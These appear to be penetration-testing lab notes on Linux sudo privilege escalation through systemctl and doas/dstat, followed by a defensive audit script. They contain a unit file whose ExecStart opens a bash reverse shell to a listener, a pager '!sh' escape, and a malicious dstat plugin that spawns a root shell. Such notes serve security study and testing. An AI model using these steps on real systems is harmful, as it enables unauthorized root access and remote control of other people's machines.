
# Sudo Privilege Escalation

Reference: [GTFOBins](https://gtfobins.github.io/)

## Systemctl

`systemctl` can be abused for privilege escalation when it can be run as root through sudo and a service's configuration file can be modified.

```bash
Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl
```

If we can run the **`systemctl`** command as root and can edit a service's configuration file, we may be able to become root.

**Case #1 Modify the configuration file**

To get a root shell, we insert a reverse-shell payload into `/etc/systemd/system/example.service`.

```ini
[Unit]
Description=This is an example service.

[Service]
Type=simple
# The service runs as root, so ExecStart executes with root privileges
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
```

Finally, reload the systemd configuration and restart the service:

```bash
sudo systemctl daemon-reload
sudo systemctl restart example.service
```

**Case #2 systemctl permissions to see the status**

```bash
Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl status example.service
```

If we can execute **`systemctl status`** as root, we can spawn another shell in the pager.

```bash
sudo systemctl status example.service
# The output opens in a pager running as root; at the pager prompt, type:
!sh
```
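An added audit sketch for the two systemctl cases above (not code from the original page): it flags `sudo -l` entries that allow unrestricted `systemctl` or a `systemctl status` that can open a pager, and lists unit files that a non-root user could modify. The function names, the sample `sudo -l` text, and treating `--no-pager` or the sudoers `NOEXEC` tag as mitigations are assumptions of this example.

```python
import os
import re
import stat

# "(runas) TAG: TAG: command, command" as printed by `sudo -l`
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def audit_sudo_rules(sudo_l_output):
    """Return (command, reason) pairs for risky systemctl sudo rules."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        tags = set(re.findall(r"[A-Z_]+", m.group(2)))
        for cmd in (c.strip() for c in m.group(3).split(",")):
            argv = cmd.split()
            if not argv or os.path.basename(argv[0]) != "systemctl":
                continue
            if len(argv) == 1:  # no args in the rule = any args allowed
                findings.append((cmd, "unrestricted systemctl"))
            elif ("status" in argv and "--no-pager" not in argv
                  and "NOEXEC" not in tags):
                findings.append((cmd, "status may open a pager as root"))
    return findings

def loosely_protected_units(unit_dir, trusted_uid=0):
    """Return unit files not owned by trusted_uid or writable by group/other."""
    bad = []
    for root, _dirs, files in os.walk(unit_dir):
        for name in sorted(files):
            path = os.path.join(root, name)
            st = os.lstat(path)
            risky = st.st_uid != trusted_uid or st.st_mode & 0o022
            if stat.S_ISREG(st.st_mode) and risky:
                bad.append(path)
    return bad

# Constructed sample input modelled on the `sudo -l` lines shown on this page.
SAMPLE = """\
    (ALL) NOPASSWD: systemctl
    (ALL) NOPASSWD: systemctl status example.service
    (ALL) NOPASSWD: NOEXEC: /usr/bin/systemctl status example.service
    (root) /usr/bin/systemctl --no-pager status example.service
"""

if __name__ == "__main__":
    print(*audit_sudo_rules(SAMPLE), sep="\n")
    print(loosely_protected_units("/etc/systemd/system"))
```

Only the first two sample rules are reported; the `NOEXEC` and `--no-pager` variants are treated as hardened forms of the same rule.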

## Doas

[`doas`](https://gtfobins.github.io/gtfobins/dstat/) is an alternative to `sudo` typically found on OpenBSD operating systems, but it can also be installed on Debian-based Linux OSes like Ubuntu.

```sh
# Find the doas configuration file
Intrusionz3r0@kali:~$ find / -name doas.conf 2>/dev/null

# Write a malicious plugin
Intrusionz3r0@kali:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_Intrusionz3r0.py

# Execute
doas /usr/bin/dstat --Intrusionz3r0
```

